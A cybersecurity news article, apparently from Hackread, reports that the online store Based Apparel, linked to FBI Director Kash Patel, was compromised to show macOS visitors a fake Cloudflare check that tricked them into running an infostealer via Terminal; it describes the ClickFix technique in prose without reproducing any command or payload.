FBI Chief Kash Patel’s Clothing Store Hacked in ClickFix Infostealer Attack

Summary

Hackers compromised Based Apparel, an online clothing store linked to FBI Director Kash Patel, to distribute infostealer malware to macOS visitors. The attack used a ClickFix technique with a fake Cloudflare verification page that tricked users into running malicious code via Terminal, designed to steal cryptocurrency and browser data. The website was taken offline by Friday after the attack was discovered.

Full text

Security Cyber Attacks Hacking News MalwareFBI Chief Kash Patel’s Clothing Store Hacked in ClickFix Infostealer Attack Hackers compromised FBI Chief Kash Patel’s clothing store in a ClickFix attack that tricked macOS users into installing infostealer malware. byDeeba AhmedMay 25, 20262 minute read An online clothing shop linked to FBI Director Kash Patel went offline on Friday after it was found distributing an Infostealer to visitors. The shop, called Based Apparel, was compromised by hackers to trick macOS users into downloading this specific type of malware that steals private data. How this ClickFix Attack Works The unknown hackers involved in this campaign used a deceptive technique known as a ClickFix attack. When a user visited BasedApparel.com, the website displayed a fake warning page designed to look exactly like Cloudflare, a website security company that runs anti-bot “Verify you are human” checks. The fake page told users that unusual web traffic was detected and asked them to complete a CAPTCHA test. To do this, the site gave highly unusual instructions and told visitors to open Terminal, which is a built-in utility on Mac computers used to execute system commands. The website showed a button that said “Copy,” claiming it would copy a simple phrase like “I am not a robot.” Instead, clicking the button copied a long piece of obfuscated text. The website then instructed the user to paste this text into their Terminal, and when it is pasted and run, the hidden code executed a shell script that connected to the hackers’ C2 domain. The malicious script was designed to drain crypto assets from digital wallets and steal sensitive session tokens and browser data. ClickFix attack on the clothing store Discovery, Website Shutdown, and Coming Back Soon Message A web user based in Portugal first spotted the attack on Thursday. Later, researchers managed to replicate the attack while navigating the store on a MacBook using the Chrome browser. However, by Friday, BasedApparel.com was completely down, displaying a message stating the store would be back online shortly. Video demo of the ClickFix attack on the compromised site (Video credit: Debbie (@dm4uz3 on X) It remains unclear whether any visitors lost data due to the cyberattack, given that it attracts so much traffic. Internet traffic data from the research firm Ahrefs reveals that the store, co-created by Kash Patel and Andrew Ollis before Patel became the head of the FBI, gets about 33,600 visits every month. At the time of writing, the website was online, only displaying a one-page message stating “We’ll Be Right Back. We’re making improvements to better serve you. The store will be back online shortly – bolder than ever. Back Soon, Stay Based.” Current status of the website (Image credit: Hackread.com) This is also not the first time Kash Patel has appeared in cybersecurity-related headlines. Last month, the Iran-linked Handala hacker group breached Patel’s personal Gmail account and leaked private photos and documents. Nevertheless, if you visited the malicious website, you should scan your browser and device for infostealer malware. Deeba Ahmed Deeba is a veteran cybersecurity reporter at Hackread.com with over a decade of experience covering cybercrime, vulnerabilities, and security events. Her expertise and in-depth analysis make her a key contributor to the platform’s trusted coverage. View Posts ClickFixCloudFlareCyber AttackCybersecurityFBIInfostealerKash PatelMalware Leave a Reply Cancel reply View Comments (0) Related Posts Read More Security News Hackers Claim Data Breach at Staffing Giant Robert Half, Sell Sensitive Data Deja vu at Robert Half? Notorious hackers claim responsibility as the staffing giant makes headlines for yet another alleged data breach in two years. byWaqas Read More Artificial Intelligence Security IT and Cybersecurity Jobs in the Age of Emerging AI Technologies Fear AI taking your IT or cybersecurity job? Don't! Learn how AI creates new opportunities in network management, threat detection & more. byWaqas Read More Security Malware AdsExhaust Adware Distributed in Fake Oculus Installer via Google Search New adware "AdsExhaust" disguises itself as an Oculus installer to steal screenshots, generate fake clicks, and drain resources. Learn how to protect yourself from AdsExhaust and similar threats. byDeeba Ahmed Security Anonymous Cyber Attacks Malware Ukraine Suffers Power Outage Possibly Due to Energy Plant Hack Looks like hackers are hell bent on giving Ukrainians a glimpse of stone age by keep on targeting… byAgan Uzunovic

Indicators of Compromise

• domain — BasedApparel.com
• malware — ClickFix infostealer

Entities